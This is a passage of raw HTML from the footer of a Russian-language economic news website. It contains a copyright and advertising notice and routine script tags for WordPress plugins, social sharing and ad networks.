опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4800370"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4800370","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "664a865f6c";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div id='div-gpt-ad-9838492-1' style="width: 100%; max-width: 1000px; position: fixed; bottom: 0; left: 0; border: 1px solid rgba(175, 179, 176, 0.75)"> <script async src='https://securepubads.g.doubleclick.net/tag/js/gpt.js'></script><script>window.googletag = window.googletag || {cmd: []};googletag.cmd.push(function() {var mapping1 = googletag.sizeMapping()
.addSize([1920, 0], [[1000, 90]]).addSize([1600, 0], [[1000, 90]]).addSize([1536, 0], [[1000, 90]]).addSize([1280, 0], [[1000, 90]]).addSize([1440, 0], [[1000, 90]]).addSize([1366, 0], [[1000, 90]]).addSize([1024, 0], [[1000, 90]])
.build();googletag.defineSlot('/112081842/enovosty.com_fluidx90_desk', 'fluid', 'div-gpt-ad-9838492-1')
.defineSizeMapping(mapping1)
.addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.pubads().collapseEmptyDivs();googletag.pubads().addEventListener('slotRenderEnded', function(e) {if(!e.isEmpty){let block_ad_WMG = document.getElementById('div-gpt-ad-9838492-1');block_ad_WMG.style.height = "90px";block_ad_WMG.style.zIndex = "9999";block_ad_WMG.style.background = "#f6f6f6";let getAdWidth = block_ad_WMG.offsetWidth;block_ad_WMG.style.left = `calc(50% - (${getAdWidth/2}px))`
var wmg_div_close = document.createElement("div"),span_1 = document.createElement("div"),span_2 = document.createElement("div");wmg_div_close.style ="position: absolute; width: 20px; height: 20px; z-index: 101; border: 0px solid grey; cursor: pointer; top: -21px; right: -1px; background: rgba(211,222,211,0.85); border-top: 1px solid rgba(175, 179, 176, 0.35); border-left: 1px solid rgba(175, 179, 176, 0.35); border-right: 1.5px solid rgba(175, 179, 176, 0.35); padding: 0.5px 0.5px 0 0.5px";span_1.style ="width: 16px; height: 2px; background: rgb(68, 68, 68); left: calc(50% - 8px); top: 50%; position: absolute; transform: rotate(45deg);";span_2.style ="width: 16px; height: 2px; background: rgb(68, 68, 68); left: calc(50% - 8px); top: 50%; position: absolute; transform: rotate(-45deg);";wmg_div_close.appendChild(span_1);wmg_div_close.appendChild(span_2);wmg_div_close.id = 'closebar-wmg-ad';wmg_div_close.addEventListener("click", function() {block_ad_WMG.remove();});function appendCloseDiv() {block_ad_WMG.appendChild(wmg_div_close);};appendCloseDiv();}});googletag.pubads().setCentering(true);googletag.pubads().set('page_url', 'https://enovosty.com/');
googletag.enableServices();googletag.display('div-gpt-ad-9838492-1');});</script></div><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script src="https://affiliate.ria.com/js/ria_informer.js?riacode=015d2e7c4ce2cda608aa710275088255" async></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> <iframe name="n01212138" style="display:none"></iframe><script>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</script></body></html>